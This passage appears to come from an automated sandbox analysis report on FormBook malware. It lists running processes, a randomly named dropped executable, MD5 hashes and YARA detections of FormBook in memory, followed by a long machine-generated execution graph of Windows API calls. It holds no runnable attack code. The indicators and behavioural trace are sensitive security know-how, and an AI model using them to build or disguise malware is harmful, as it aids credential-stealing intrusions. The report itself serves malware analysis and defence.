                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            Reputation:moderate
                            Has exited:false

                            Target ID:7
                            Start time:03:07:50
                            Start date:27/09/2024
                            Path:C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe"
                            Imagebase:0x800000
                            File size:140'800 bytes
                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:false

                            Target ID:8
                            Start time:03:08:02
                            Start date:27/09/2024
                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                            Imagebase:0x7ff79f9e0000
                            File size:676'768 bytes
                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:3.4%
                              Dynamic/Decrypted Code Coverage:0.4%
                              Signature Coverage:8.8%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:35
                              execution_graph 86101 4010e0 86104 401100 86101->86104 86103 4010f8 86105 401113 86104->86105 86106 401184 86105->86106 86107 40114c 86105->86107 86115 401120 86105->86115 86138 401182 86105->86138 86142 401250 86106->86142 86109 401151 86107->86109 86110 40119d 86107->86110 86108 40112c DefWindowProcW 86108->86103 86113 401219 86109->86113 86114 40115d 86109->86114 86112 42afb4 86110->86112 86117 4011a3 86110->86117 86158 40f190 10 API calls 86112->86158 86113->86115 86120 401225 86113->86120 86118 401163 86114->86118 86119 42b01d 86114->86119 86115->86108 86163 401000 Shell_NotifyIconW __recalloc 86115->86163 86116 401193 86116->86103 86117->86115 86123 4011b6 KillTimer 86117->86123 86124 4011db SetTimer RegisterWindowMessageW 86117->86124 86125 42afe9 86118->86125 86126 40116c 86118->86126 86119->86108 86162 4370f4 52 API calls 86119->86162 86174 468b0e 74 API calls __recalloc 86120->86174 86157 401000 Shell_NotifyIconW __recalloc 86123->86157 86124->86116 86131 401204 CreatePopupMenu 86124->86131 86160 40f190 10 API calls 86125->86160 86126->86115 86133 401174 86126->86133 86127 42b04f 86164 40e0c0 86127->86164 86131->86103 86159 45fd57 65 API calls __recalloc 86133->86159 86135 42afe4 86135->86116 86136 42b00e 86161 401a50 331 API calls 86136->86161 86137 4011c9 PostQuitMessage 86137->86103 86138->86108 86141 42afdc 86141->86108 86141->86135 86143 401262 __recalloc 86142->86143 86144 4012e8 86142->86144 86175 401b80 86143->86175 86144->86116 86146 40128c 86147 4012d1 KillTimer SetTimer 86146->86147 86148 4012bb 86146->86148 86149 4272ec 86146->86149 86147->86144 86150 4012c5 86148->86150 86151 42733f 86148->86151 86152 4272f4 Shell_NotifyIconW 86149->86152 86153 42731a Shell_NotifyIconW 86149->86153 86150->86147 86154 427393 Shell_NotifyIconW 86150->86154 86155 427348 Shell_NotifyIconW 86151->86155 86156 42736e Shell_NotifyIconW 86151->86156 86152->86147 86153->86147 86154->86147 86155->86147 86156->86147 86157->86137 86158->86116 86159->86141 86160->86136 86161->86138 86162->86138 86163->86127 86166 40e0e7 __recalloc 86164->86166 86165 40e142 86167 40e184 86165->86167 86273 4341e6 63 API calls __wcsicoll 86165->86273 86166->86165 86168 42729f DestroyIcon 86166->86168 86170 40e1a0 Shell_NotifyIconW 86167->86170 86171 4272db Shell_NotifyIconW 86167->86171 86168->86165 86172 401b80 54 API calls 86170->86172 86173 40e1ba 86172->86173 86173->86138 86174->86135 86176 401b9c 86175->86176 86196 401c7e 86175->86196 86197 4013c0 86176->86197 86179 42722b LoadStringW 86182 427246 86179->86182 86180 401bb9 86202 402160 86180->86202 86216 40e0a0 86182->86216 86183 401bcd 86185 427258 86183->86185 86186 401bda 86183->86186 86220 40d200 52 API calls 2 library calls 86185->86220 86186->86182 86188 401be4 86186->86188 86187 401bf3 _wcscpy __recalloc _wcsncpy 86195 401c62 Shell_NotifyIconW 86187->86195 86215 40d200 52 API calls 2 library calls 86188->86215 86191 427267 86191->86187 86192 42727b 86191->86192 86221 40d200 52 API calls 2 library calls 86192->86221 86194 427289 86195->86196 86196->86146 86222 4115d7 86197->86222 86203 426daa 86202->86203 86204 40216b _wcslen 86202->86204 86260 40c600 86203->86260 86207 402180 86204->86207 86208 40219e 86204->86208 86206 426db5 86206->86183 86259 403bd0 52 API calls moneypunct 86207->86259 86209 4013a0 52 API calls 86208->86209 86212 4021a5 86209->86212 86211 402187 _memmove 86211->86183 86213 426db7 86212->86213 86214 4115d7 52 API calls 86212->86214 86214->86211 86215->86187 86217 40e0b2 86216->86217 86218 40e0a8 86216->86218 86217->86187 86272 403c30 52 API calls _memmove 86218->86272 86220->86191 86221->86194 86224 4115e1 _malloc 86222->86224 86225 4013e4 86224->86225 86229 4115fd std::exception::exception 86224->86229 86236 4135bb 86224->86236 86233 4013a0 86225->86233 86226 41163b 86251 4180af 46 API calls std::exception::operator= 86226->86251 86228 411645 86252 418105 RaiseException 86228->86252 86229->86226 86250 41130a 51 API calls __cinit 86229->86250 86232 411656 86234 4115d7 52 API calls 86233->86234 86235 4013a7 86234->86235 86235->86179 86235->86180 86237 413638 _malloc 86236->86237 86245 4135c9 _malloc 86236->86245 86258 417f77 46 API calls __getptd_noexit 86237->86258 86240 4135f7 RtlAllocateHeap 86241 413630 86240->86241 86240->86245 86241->86224 86243 4135d4 86243->86245 86253 418901 46 API calls 2 library calls 86243->86253 86254 418752 46 API calls 8 library calls 86243->86254 86255 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86243->86255 86244 413624 86256 417f77 46 API calls __getptd_noexit 86244->86256 86245->86240 86245->86243 86245->86244 86248 413622 86245->86248 86257 417f77 46 API calls __getptd_noexit 86248->86257 86250->86226 86251->86228 86252->86232 86253->86243 86254->86243 86256->86248 86257->86241 86258->86241 86259->86211 86261 40c619 86260->86261 86262 40c60a 86260->86262 86261->86206 86262->86261 86265 4026f0 86262->86265 86264 426d7a _memmove 86264->86206 86266 426873 86265->86266 86267 4026ff 86265->86267 86268 4013a0 52 API calls 86266->86268 86267->86264 86269 42687b 86268->86269 86270 4115d7 52 API calls 86269->86270 86271 42689e _memmove 86270->86271 86271->86264 86272->86217 86273->86167 86274 40bd20 86275 428194 86274->86275 86279 40bd2d 86274->86279 86276 40bd43 86275->86276 86278 4281bc 86275->86278 86280 4281b2 86275->86280 86296 45e987 86 API calls moneypunct 86278->86296 86284 40bd37 86279->86284 86297 4531b1 85 API calls 5 library calls 86279->86297 86295 40b510 VariantClear 86280->86295 86286 40bd50 86284->86286 86285 4281ba 86287 426cf1 86286->86287 86288 40bd63 86286->86288 86307 44cde9 52 API calls _memmove 86287->86307 86298 40bd80 86288->86298 86291 40bd73 86291->86276 86292 426cfc 86293 40e0a0 52 API calls 86292->86293 86294 426d02 86293->86294 86295->86285 86296->86279 86297->86284 86299 40bd8e 86298->86299 86300 40bdb7 _memmove 86298->86300 86299->86300 86301 40bded 86299->86301 86302 40bdad 86299->86302 86300->86291 86303 4115d7 52 API calls 86301->86303 86308 402f00 86302->86308 86305 40bdf6 86303->86305 86305->86300 86306 4115d7 52 API calls 86305->86306 86306->86300 86307->86292 86309 402f10 86308->86309 86310 402f0c 86308->86310 86311 4115d7 52 API calls 86309->86311 86312 4268c3 86309->86312 86310->86300 86313 402f51 moneypunct _memmove 86311->86313 86313->86300 86314 425ba2 86319 40e360 86314->86319 86316 425bb4 86335 41130a 51 API calls __cinit 86316->86335 86318 425bbe 86320 4115d7 52 API calls 86319->86320 86321 40e3ec GetModuleFileNameW 86320->86321 86336 413a0e 86321->86336 86323 40e421 _wcsncat 86339 413a9e 86323->86339 86326 4115d7 52 API calls 86327 40e45e _wcscpy 86326->86327 86342 40bc70 86327->86342 86331 40e4a9 86331->86316 86332 401c90 52 API calls 86334 40e4a1 _wcscat _wcslen _wcsncpy 86332->86334 86333 4115d7 52 API calls 86333->86334 86334->86331 86334->86332 86334->86333 86335->86318 86361 413801 86336->86361 86391 419efd 86339->86391 86343 4115d7 52 API calls 86342->86343 86344 40bc98 86343->86344 86345 4115d7 52 API calls 86344->86345 86346 40bca6 86345->86346 86347 40e4c0 86346->86347 86403 403350 86347->86403 86349 40e4cb RegOpenKeyExW 86350 427190 RegQueryValueExW 86349->86350 86351 40e4eb 86349->86351 86352 4271b0 86350->86352 86353 42721a RegCloseKey 86350->86353 86351->86334 86354 4115d7 52 API calls 86352->86354 86353->86334 86355 4271cb 86354->86355 86410 43652f 52 API calls 86355->86410 86357 4271d8 RegQueryValueExW 86358 42720e 86357->86358 86359 4271f7 86357->86359 86358->86353 86360 402160 52 API calls 86359->86360 86360->86358 86362 41389e 86361->86362 86369 41381a 86361->86369 86363 4139e8 86362->86363 86365 413a00 86362->86365 86388 417f77 46 API calls __getptd_noexit 86363->86388 86390 417f77 46 API calls __getptd_noexit 86365->86390 86366 4139ed 86389 417f25 10 API calls __wsopen_helper 86366->86389 86369->86362 86376 41388a 86369->86376 86383 419e30 46 API calls 2 library calls 86369->86383 86371 41396c 86371->86362 86372 413967 86371->86372 86374 41397a 86371->86374 86372->86323 86373 413929 86373->86362 86375 413945 86373->86375 86385 419e30 46 API calls 2 library calls 86373->86385 86387 419e30 46 API calls 2 library calls 86374->86387 86375->86362 86375->86372 86379 41395b 86375->86379 86376->86362 86382 413909 86376->86382 86384 419e30 46 API calls 2 library calls 86376->86384 86386 419e30 46 API calls 2 library calls 86379->86386 86382->86371 86382->86373 86383->86376 86384->86382 86385->86375 86386->86372 86387->86372 86388->86366 86389->86372 86390->86372 86392 419f13 86391->86392 86393 419f0e 86391->86393 86400 417f77 46 API calls __getptd_noexit 86392->86400 86393->86392 86394 419f2b 86393->86394 86398 40e454 86394->86398 86402 417f77 46 API calls __getptd_noexit 86394->86402 86398->86326 86399 419f18 86401 417f25 10 API calls __wsopen_helper 86399->86401 86400->86399 86401->86398 86402->86399 86404 403367 86403->86404 86405 403358 86403->86405 86406 4115d7 52 API calls 86404->86406 86405->86349 86407 403370 86406->86407 86408 4115d7 52 API calls 86407->86408 86409 40339e 86408->86409 86409->86349 86410->86357 86411 416454 86448 416c70 86411->86448 86413 416460 GetStartupInfoW 86414 416474 86413->86414 86449 419d5a HeapCreate 86414->86449 86416 4164cd 86417 4164d8 86416->86417 86533 41642b 46 API calls 3 library calls 86416->86533 86450 417c20 GetModuleHandleW 86417->86450 86420 4164de 86421 4164e9 __RTC_Initialize 86420->86421 86534 41642b 46 API calls 3 library calls 86420->86534 86469 41aaa1 GetStartupInfoW 86421->86469 86425 416503 GetCommandLineW 86482 41f584 GetEnvironmentStringsW 86425->86482 86429 416513 86488 41f4d6 GetModuleFileNameW 86429->86488 86431 41651d 86432 416528 86431->86432 86536 411924 46 API calls 3 library calls 86431->86536 86492 41f2a4 86432->86492 86435 41652e 86436 416539 86435->86436 86537 411924 46 API calls 3 library calls 86435->86537 86506 411703 86436->86506 86439 416541 86441 41654c __wwincmdln 86439->86441 86538 411924 46 API calls 3 library calls 86439->86538 86510 40d6b0 86441->86510 86444 41657c 86540 411906 46 API calls _doexit 86444->86540 86447 416581 __wsopen_helper 86448->86413 86449->86416 86451 417c34 86450->86451 86452 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86450->86452 86541 4178ff 49 API calls _free 86451->86541 86455 417c87 TlsAlloc 86452->86455 86454 417c39 86454->86420 86457 417cd5 TlsSetValue 86455->86457 86458 417d96 86455->86458 86457->86458 86459 417ce6 __init_pointers 86457->86459 86458->86420 86542 418151 InitializeCriticalSectionAndSpinCount 86459->86542 86461 417d91 86550 4178ff 49 API calls _free 86461->86550 86463 417d2a 86463->86461 86543 416b49 86463->86543 86466 417d76 86549 41793c 46 API calls 4 library calls 86466->86549 86468 417d7e GetCurrentThreadId 86468->86458 86470 416b49 __calloc_crt 46 API calls 86469->86470 86472 41aabf 86470->86472 86471 41ac34 86473 41ac6a GetStdHandle 86471->86473 86475 41acce SetHandleCount 86471->86475 86477 41ac7c GetFileType 86471->86477 86481 41aca2 InitializeCriticalSectionAndSpinCount 86471->86481 86472->86471 86474 416b49 __calloc_crt 46 API calls 86472->86474 86476 4164f7 86472->86476 86478 41abb4 86472->86478 86473->86471 86474->86472 86475->86476 86476->86425 86535 411924 46 API calls 3 library calls 86476->86535 86477->86471 86478->86471 86479 41abe0 GetFileType 86478->86479 86480 41abeb InitializeCriticalSectionAndSpinCount 86478->86480 86479->86478 86479->86480 86480->86476 86480->86478 86481->86471 86481->86476 86483 41f595 86482->86483 86484 41f599 86482->86484 86483->86429 86560 416b04 86484->86560 86486 41f5bb _memmove 86487 41f5c2 FreeEnvironmentStringsW 86486->86487 86487->86429 86489 41f50b _wparse_cmdline 86488->86489 86490 416b04 __malloc_crt 46 API calls 86489->86490 86491 41f54e _wparse_cmdline 86489->86491 86490->86491 86491->86431 86493 41f2bc _wcslen 86492->86493 86497 41f2b4 86492->86497 86494 416b49 __calloc_crt 46 API calls 86493->86494 86499 41f2e0 _wcslen 86494->86499 86495 41f336 86567 413748 86495->86567 86497->86435 86498 416b49 __calloc_crt 46 API calls 86498->86499 86499->86495 86499->86497 86499->86498 86500 41f35c 86499->86500 86503 41f373 86499->86503 86566 41ef12 46 API calls 2 library calls 86499->86566 86501 413748 _free 46 API calls 86500->86501 86501->86497 86573 417ed3 86503->86573 86505 41f37f 86505->86435 86507 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86506->86507 86509 411750 __IsNonwritableInCurrentImage 86507->86509 86592 41130a 51 API calls __cinit 86507->86592 86509->86439 86511 42e2f3 86510->86511 86512 40d6cc 86510->86512 86593 408f40 86512->86593 86514 40d707 86597 40ebb0 86514->86597 86519 40d737 86600 411951 86519->86600 86522 40d751 86612 40f4e0 SystemParametersInfoW SystemParametersInfoW 86522->86612 86524 40d75f 86613 40d590 GetCurrentDirectoryW 86524->86613 86526 40d767 SystemParametersInfoW 86527 40d794 86526->86527 86528 40d78d FreeLibrary 86526->86528 86529 408f40 VariantClear 86527->86529 86528->86527 86530 40d79d 86529->86530 86531 408f40 VariantClear 86530->86531 86532 40d7a6 86531->86532 86532->86444 86539 4118da 46 API calls _doexit 86532->86539 86533->86417 86534->86421 86539->86444 86540->86447 86541->86454 86542->86463 86545 416b52 86543->86545 86546 416b8f 86545->86546 86547 416b70 Sleep 86545->86547 86551 41f677 86545->86551 86546->86461 86546->86466 86548 416b85 86547->86548 86548->86545 86548->86546 86549->86468 86550->86458 86552 41f683 86551->86552 86557 41f69e _malloc 86551->86557 86553 41f68f 86552->86553 86552->86557 86559 417f77 46 API calls __getptd_noexit 86553->86559 86554 41f6b1 HeapAlloc 86556 41f6d8 86554->86556 86554->86557 86556->86545 86557->86554 86557->86556 86558 41f694 86558->86545 86559->86558 86563 416b0d 86560->86563 86561 4135bb _malloc 45 API calls 86561->86563 86562 416b43 86562->86486 86563->86561 86563->86562 86564 416b24 Sleep 86563->86564 86565 416b39 86564->86565 86565->86562 86565->86563 86566->86499 86568 413753 RtlFreeHeap 86567->86568 86572 41377c __dosmaperr 86567->86572 86569 413768 86568->86569 86568->86572 86576 417f77 46 API calls __getptd_noexit 86569->86576 86571 41376e GetLastError 86571->86572 86572->86497 86577 417daa 86573->86577 86576->86571 86578 417dc9 __recalloc __call_reportfault 86577->86578 86579 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86578->86579 86582 417eb5 __call_reportfault 86579->86582 86581 417ed1 GetCurrentProcess TerminateProcess 86581->86505 86583 41a208 86582->86583 86584 41a210 86583->86584 86585 41a212 IsDebuggerPresent 86583->86585 86584->86581 86591 41fe19 86585->86591 86588 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86589 421ff0 __call_reportfault 86588->86589 86590 421ff8 GetCurrentProcess TerminateProcess 86588->86590 86589->86590 86590->86581 86591->86588 86592->86509 86595 408f48 moneypunct 86593->86595 86594 4265c7 VariantClear 86596 408f55 moneypunct 86594->86596 86595->86594 86595->86596 86596->86514 86653 40ebd0 86597->86653 86657 4182cb 86600->86657 86602 41195e 86664 4181f2 LeaveCriticalSection 86602->86664 86604 40d748 86605 4119b0 86604->86605 86606 4119d6 86605->86606 86607 4119bc 86605->86607 86606->86522 86607->86606 86699 417f77 46 API calls __getptd_noexit 86607->86699 86609 4119c6 86700 417f25 10 API calls __wsopen_helper 86609->86700 86611 4119d1 86611->86522 86612->86524 86701 401f20 86613->86701 86615 40d5b6 IsDebuggerPresent 86616 40d5c4 86615->86616 86617 42e1bb MessageBoxA 86615->86617 86618 42e1d4 86616->86618 86619 40d5e3 86616->86619 86617->86618 86873 403a50 52 API calls 3 library calls 86618->86873 86771 40f520 86619->86771 86623 40d5fd GetFullPathNameW 86783 401460 86623->86783 86625 40d63b 86626 40d643 86625->86626 86627 42e231 SetCurrentDirectoryW 86625->86627 86628 40d64c 86626->86628 86874 432fee 6 API calls 86626->86874 86627->86626 86798 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86628->86798 86631 42e252 86631->86628 86633 42e25a GetModuleFileNameW 86631->86633 86635 42e274 86633->86635 86636 42e2cb GetForegroundWindow ShellExecuteW 86633->86636 86875 401b10 86635->86875 86638 40d688 86636->86638 86637 40d656 86640 40d669 86637->86640 86643 40e0c0 74 API calls 86637->86643 86645 40d692 SetCurrentDirectoryW 86638->86645 86806 4091e0 86640->86806 86643->86640 86645->86526 86647 42e28d 86882 40d200 52 API calls 2 library calls 86647->86882 86650 42e299 GetForegroundWindow ShellExecuteW 86651 42e2c6 86650->86651 86651->86638 86652 40ec00 LoadLibraryA GetProcAddress 86652->86519 86654 40d72e 86653->86654 86655 40ebd6 LoadLibraryA 86653->86655 86654->86519 86654->86652 86655->86654 86656 40ebe7 GetProcAddress 86655->86656 86656->86654 86658 4182e0 86657->86658 86659 4182f3 EnterCriticalSection 86657->86659 86665 418209 86658->86665 86659->86602 86661 4182e6 86661->86659 86692 411924 46 API calls 3 library calls 86661->86692 86664->86604 86666 418215 __wsopen_helper 86665->86666 86667 418225 86666->86667 86668 41823d 86666->86668 86693 418901 46 API calls 2 library calls 86667->86693 86670 416b04 __malloc_crt 45 API calls 86668->86670 86676 41824b __wsopen_helper 86668->86676 86672 418256 86670->86672 86671 41822a 86694 418752 46 API calls 8 library calls 86671->86694 86674 41825d 86672->86674 86675 41826c 86672->86675 86696 417f77 46 API calls __getptd_noexit 86674->86696 86679 4182cb __lock 45 API calls 86675->86679 86676->86661 86677 418231 86695 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86677->86695 86682 418273 86679->86682 86683 4182a6 86682->86683 86684 41827b InitializeCriticalSectionAndSpinCount 86682->86684 86685 413748 _free 45 API calls 86683->86685 86686 418297 86684->86686 86687 41828b 86684->86687 86685->86686 86698 4182c2 LeaveCriticalSection _doexit 86686->86698 86688 413748 _free 45 API calls 86687->86688 86690 418291 86688->86690 86697 417f77 46 API calls __getptd_noexit 86690->86697 86693->86671 86694->86677 86696->86676 86697->86686 86698->86676 86699->86609 86700->86611 86883 40e6e0 86701->86883 86705 401f41 GetModuleFileNameW 86901 410100 86705->86901 86707 401f5c 86913 410960 86707->86913 86710 401b10 52 API calls 86711 401f81 86710->86711 86916 401980 86711->86916 86713 401f8e 86714 408f40 VariantClear 86713->86714 86715 401f9d 86714->86715 86716 401b10 52 API calls 86715->86716 86717 401fb4 86716->86717 86718 401980 53 API calls 86717->86718 86719 401fc3 86718->86719 86720 401b10 52 API calls 86719->86720 86721 401fd2 86720->86721 86924 40c2c0 86721->86924 86723 401fe1 86724 40bc70 52 API calls 86723->86724 86725 401ff3 86724->86725 86942 401a10 86725->86942 86727 401ffe 86949 4114ab 86727->86949 86730 428b05 86732 401a10 52 API calls 86730->86732 86731 402017 86733 4114ab __wcsicoll 58 API calls 86731->86733 86734 428b18 86732->86734 86735 402022 86733->86735 86737 401a10 52 API calls 86734->86737 86735->86734 86736 40202d 86735->86736 86738 4114ab __wcsicoll 58 API calls 86736->86738 86739 428b33 86737->86739 86740 402038 86738->86740 86742 428b3b GetModuleFileNameW 86739->86742 86741 402043 86740->86741 86740->86742 86743 4114ab __wcsicoll 58 API calls 86741->86743 86744 401a10 52 API calls 86742->86744 86746 40204e 86743->86746 86745 428b6c 86744->86745 86748 40e0a0 52 API calls 86745->86748 86747 402092 86746->86747 86751 401a10 52 API calls 86746->86751 86756 428b90 _wcscpy 86746->86756 86750 4020a3 86747->86750 86747->86756 86749 428b7a 86748->86749 86752 401a10 52 API calls 86749->86752 86753 428bc6 86750->86753 86957 40e830 53 API calls 86750->86957 86754 402073 _wcscpy 86751->86754 86755 428b88 86752->86755 86761 401a10 52 API calls 86754->86761 86755->86756 86758 401a10 52 API calls 86756->86758 86764 4020d0 86758->86764 86759 4020bb 86958 40cf00 53 API calls 86759->86958 86761->86747 86762 4020c6 86763 408f40 VariantClear 86762->86763 86763->86764 86767 402110 86764->86767 86769 401a10 52 API calls 86764->86769 86959 40cf00 53 API calls 86764->86959 86960 40e6a0 53 API calls 86764->86960 86768 408f40 VariantClear 86767->86768 86770 402120 moneypunct 86768->86770 86769->86764 86770->86615 86772 4295c9 __recalloc 86771->86772 86773 40f53c 86771->86773 86775 4295d9 GetOpenFileNameW 86772->86775 87640 410120 86773->87640 86775->86773 86778 40d5f5 86775->86778 86776 40f545 87644 4102b0 SHGetMalloc 86776->87644 86778->86623 86778->86625 86779 40f54c 87649 410190 GetFullPathNameW 86779->87649 86781 40f559 87660 40f570 86781->87660 87722 402400 86783->87722 86785 40146f 86788 428c29 _wcscat 86785->86788 87731 401500 86785->87731 86787 40147c 86787->86788 87739 40d440 86787->87739 86790 401489 86790->86788 86791 401491 GetFullPathNameW 86790->86791 86792 402160 52 API calls 86791->86792 86793 4014bb 86792->86793 86794 402160 52 API calls 86793->86794 86795 4014c8 86794->86795 86795->86788 86796 402160 52 API calls 86795->86796 86797 4014ee 86796->86797 86797->86625 86799 428361 86798->86799 86800 4103fc LoadImageW RegisterClassExW 86798->86800 87759 44395e EnumResourceNamesW LoadImageW 86799->87759 87758 410490 7 API calls 86800->87758 86803 40d651 86805 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86803->86805 86804 428368 86805->86637 86807 409202 86806->86807 86808 42d7ad 86806->86808 86865 409216 moneypunct 86807->86865 88031 410940 331 API calls 86807->88031 88034 45e737 90 API calls 3 library calls 86808->88034 86811 409386 86812 40939c 86811->86812 88032 40f190 10 API calls 86811->88032 86812->86638 86872 401000 Shell_NotifyIconW __recalloc 86812->86872 86814 4095b2 86814->86812 86816 4095bf 86814->86816 86815 409253 PeekMessageW 86815->86865 88033 401a50 331 API calls 86816->88033 86818 42d8cd Sleep 86818->86865 86819 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86819->86812 86822 4095f9 86819->86822 86821 42e13b 88052 40d410 VariantClear 86821->88052 86825 42e158 TranslateMessage DispatchMessageW GetMessageW 86822->86825 86825->86825 86827 42e188 86825->86827 86826 409567 PeekMessageW 86826->86865 86827->86812 86830 44c29d 52 API calls 86871 4094e0 86830->86871 86831 46f3c1 107 API calls 86831->86865 86832 40e0a0 52 API calls 86832->86865 86833 46fdbf 108 API calls 86833->86871 86834 409551 TranslateMessage DispatchMessageW 86834->86826 86836 42dcd2 WaitForSingleObject 86839 42dcf0 GetExitCodeProcess CloseHandle 86836->86839 86836->86865 86837 42dd3d Sleep 86837->86871 86838 47d33e 309 API calls 86838->86865 88041 40d410 VariantClear 86839->88041 86843 4094cf Sleep 86843->86871 86844 42d94d timeGetTime 88037 465124 53 API calls 86844->88037 86846 40d410 VariantClear 86846->86865 86847 408f40 VariantClear 86847->86871 86850 40c620 timeGetTime 86850->86871 86851 465124 53 API calls 86851->86871 86853 42dd89 CloseHandle 86853->86871 86855 42de19 GetExitCodeProcess CloseHandle 86855->86871 86856 401b10 52 API calls 86856->86871 86859 42de88 Sleep 86859->86865 86862 45e737 90 API calls 86862->86865 86865->86811 86865->86815 86865->86818 86865->86821 86865->86826 86865->86831 86865->86832 86865->86834 86865->86836 86865->86837 86865->86838 86865->86843 86865->86844 86865->86846 86865->86862 86866 42e0cc VariantClear 86865->86866 86867 408f40 VariantClear 86865->86867 86865->86871 87760 4091b0 86865->87760 87818 40afa0 86865->87818 87844 408fc0 86865->87844 87879 408cc0 86865->87879 87893 40d150 86865->87893 87898 40d170 86865->87898 87904 4096a0 86865->87904 88035 465124 53 API calls 86865->88035 88036 40c620 timeGetTime 86865->88036 88051 40e270 VariantClear moneypunct 86865->88051 86866->86865 86867->86865 86869 401980 53 API calls 86869->86871 86871->86830 86871->86833 86871->86847 86871->86850 86871->86851 86871->86853 86871->86855 86871->86856 86871->86859 86871->86865 86871->86869 88038 45178a 54 API calls 86871->88038 88039 47d33e 331 API calls 86871->88039 88040 453bc6 54 API calls 86871->88040 88042 40d410 VariantClear 86871->88042 88043 443d19 67 API calls _wcslen 86871->88043 88044 4574b4 VariantClear 86871->88044 88045 403cd0 86871->88045 88049 4731e1 VariantClear 86871->88049 88050 4331a2 6 API calls 86871->88050 86872->86638 86873->86625 86874->86631 86876 401b16 _wcslen 86875->86876 86877 4115d7 52 API calls 86876->86877 86880 401b63 86876->86880 86878 401b4b _memmove 86877->86878 86879 4115d7 52 API calls 86878->86879 86879->86880 86881 40d200 52 API calls 2 library calls 86880->86881 86881->86647 86882->86650 86884 40bc70 52 API calls 86883->86884 86885 401f31 86884->86885 86886 402560 86885->86886 86887 40256d __write_nolock 86886->86887 86888 402160 52 API calls 86887->86888 86890 402593 86888->86890 86892 4025bd 86890->86892 86961 401c90 86890->86961 86891 4026f0 52 API calls 86891->86892 86892->86891 86894 4026a7 86892->86894 86896 401b10 52 API calls 86892->86896 86899 401c90 52 API calls 86892->86899 86964 40d7c0 52 API calls 2 library calls 86892->86964 86893 4026db 86893->86705 86894->86893 86895 401b10 52 API calls 86894->86895 86897 4026d1 86895->86897 86896->86892 86965 40d7c0 52 API calls 2 library calls 86897->86965 86899->86892 86966 40f760 86901->86966 86904 410118 86904->86707 86906 42805d 86907 42806a 86906->86907 87022 431e58 86906->87022 86909 413748 _free 46 API calls 86907->86909 86910 428078 86909->86910 86911 431e58 82 API calls 86910->86911 86912 428084 86911->86912 86912->86707 86914 4115d7 52 API calls 86913->86914 86915 401f74 86914->86915 86915->86710 86917 4019a3 86916->86917 86921 401985 86916->86921 86918 4019b8 86917->86918 86917->86921 87629 403e10 53 API calls 86918->87629 86920 40199f 86920->86713 86921->86920 87628 403e10 53 API calls 86921->87628 86923 4019c4 86923->86713 86925 40c2c7 86924->86925 86926 40c30e 86924->86926 86929 40c2d3 86925->86929 86934 426c79 86925->86934 86927 40c315 86926->86927 86928 426c2b 86926->86928 86932 40c321 86927->86932 86933 426c5a 86927->86933 86931 426c4b 86928->86931 86935 426c2e 86928->86935 87630 403ea0 52 API calls __cinit 86929->87630 87633 4534e3 52 API calls 86931->87633 87631 403ea0 52 API calls __cinit 86932->87631 87634 4534e3 52 API calls 86933->87634 87635 4534e3 52 API calls 86934->87635 86940 40c2de 86935->86940 87632 4534e3 52 API calls 86935->87632 86940->86723 86943 401a30 86942->86943 86944 401a17 86942->86944 86945 402160 52 API calls 86943->86945 86946 401a2d 86944->86946 87636 403c30 52 API calls _memmove 86944->87636 86948 401a3d 86945->86948 86946->86727 86948->86727 86950 411523 86949->86950 86951 4114ba 86949->86951 87639 4113a8 58 API calls 4 library calls 86950->87639 86956 40200c 86951->86956 87637 417f77 46 API calls __getptd_noexit 86951->87637 86954 4114c6 87638 417f25 10 API calls __wsopen_helper 86954->87638 86956->86730 86956->86731 86957->86759 86958->86762 86959->86764 86960->86764 86962 4026f0 52 API calls 86961->86962 86963 401c97 86962->86963 86963->86890 86964->86892 86965->86893 87026 40f6f0 86966->87026 86968 40f77b _strcat moneypunct 87034 40f850 86968->87034 86973 427c2a 87064 414d04 